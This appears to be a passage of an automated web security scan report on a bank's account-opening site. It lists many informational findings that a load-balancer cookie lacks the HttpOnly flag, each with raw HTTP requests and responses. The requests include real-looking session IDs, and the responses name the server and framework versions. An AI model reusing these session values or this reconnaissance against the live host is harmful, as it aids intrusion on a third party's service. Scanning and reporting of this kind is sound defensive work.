Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/FormHandler.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/FormHandler.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 86459
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT
Accept-Ranges: bytes
ETag: "04cba3f88ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:56 GMT

...// JScript File
var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var
...[SNIP]...

8.34. https://secureapps.regions.com/oao/Images/confirmation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/confirmation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/confirmation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2319
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a........t....nnn............VVV....U.DDD....................X.............`...............D.....w......!.......,............'.di.h..l..p,....B.!w.6.m0.*4.A...9...t:.....Q.4*.^.H .R...:v8~
m..g.
...[SNIP]...

8.35. https://secureapps.regions.com/oao/Images/funding.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/funding.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/funding.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 3849
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a.......DDD.....................sssfff.......U.....l".....D.......`...f.......w3.....w..U...............!.......,............'.di.h..l..p,..`#.....|...`..
#..G.9......&.;./($...QB....h.9..E....1
...[SNIP]...

8.36. https://secureapps.regions.com/oao/Images/gettingstarted.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/gettingstarted.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/gettingstarted.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2300
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:07 GMT

GIF89a................ppp......VVV.......U.DDD........Y.w3...yyy....`...............D....l"...iii......fff...!.......,............'.di.h..l..p,..bC.w...}..M .*.#....9........;./($....F....h........oT.
...[SNIP]...

8.37. https://secureapps.regions.com/oao/Images/helpIcon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/helpIcon.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/helpIcon.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 326
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a......l."w.3.....w`..Y..]....K.....u[.    .....Q..N..................W..}.<........{a................`..f.?..T...............k.!..x..._........U...................................................
...[SNIP]...

8.38. https://secureapps.regions.com/oao/Images/loading7.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/loading7.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/loading7.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2246
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89aQ....?...............w.....H..h..r........X........*....................5..+.....i..X..;..K..............s..l.....<..L.................).....Y........f.....@.....8..H.....y...........I........W.
...[SNIP]...

8.39. https://secureapps.regions.com/oao/Images/yourinformation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/yourinformation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/yourinformation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4021
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a............................sss...VVV.......l".....DDDD..f....w3........U.`......w..........U.fff......!.......,............'.di.h..l..p,..c......}..m0.>......9......&.;./($...QGx...hs..    ....oT.
...[SNIP]...

8.40. https://secureapps.regions.com/oao/Scripts/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/jquery.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 29856
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* jQuery 1.2.3 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

8.41. https://secureapps.regions.com/oao/Scripts/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/thickbox.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/thickbox.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17069
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...

8.42. https://secureapps.regions.com/oao/app01.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app01.aspx?type=prefplus HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; domain=secureapps.regions.com; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

8.43. https://secureapps.regions.com/oao/app02.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app02.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app02.aspx?type=savings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

8.44. https://secureapps.regions.com/oao/images/arrowOrange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/arrowOrange.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;

8.45. https://secureapps.regions.com/oao/images/bgDot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/bgDot.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.............!.......,.................;

8.46. https://secureapps.regions.com/oao/images/continue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/continue.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/continue.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 407
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89aG...............]..`....V.....wl."..f.....D......w.3......[.    d....i..T.....A..N.....rq.*.........U.....!.......,....G........e.g.h..l....}...x...7..`.....-.+a.t.. a2...".........=B..o..p>L    ....
...[SNIP]...

8.47. https://secureapps.regions.com/oao/images/ehl_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/ehl_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/ehl_logo.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 595
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.........[[[...\\\MMM......ttt......```hhhmmm]]]...WWW___......KKK|||......jjj...{{{~~~.........VVV...............XXXlllRRR...xxxQQQ............yyy..................vvvbbb......iii.............
...[SNIP]...

8.48. https://secureapps.regions.com/oao/images/error.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/error.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/error.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 299
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89a..........,........}y....`[....E<....... ..............ro.SM.......'..................................!.......,.......... ...40U:)."8.. .UgVve:$~.
...d8.N`.Q...%..h0....    ...O...\...........s%
...[SNIP]...

8.49. https://secureapps.regions.com/oao/images/homepage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/homepage.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/homepage.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/ErrorPage.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555620131:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 632
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:42 GMT

GIF89a.........U`........]....D..w..............f......w.3...[.    d....T........B..N....?.........l."...U.....!.......,...............g.h..l..p,.ht}...|..@........k.Q:.P..u.X;.....&..S..-7W...Q..M..<..
...[SNIP]...

8.50. https://secureapps.regions.com/oao/images/icon_secure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/icon_secure.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/icon_secure.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 77
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a    .............i....!.......,....    .........1-;.....n..#.4b.F"x.........;

8.51. https://secureapps.regions.com/oao/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/loadingAnimation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:17 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...

8.52. https://secureapps.regions.com/oao/scripts/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/scripts/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/scripts/wtbase.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
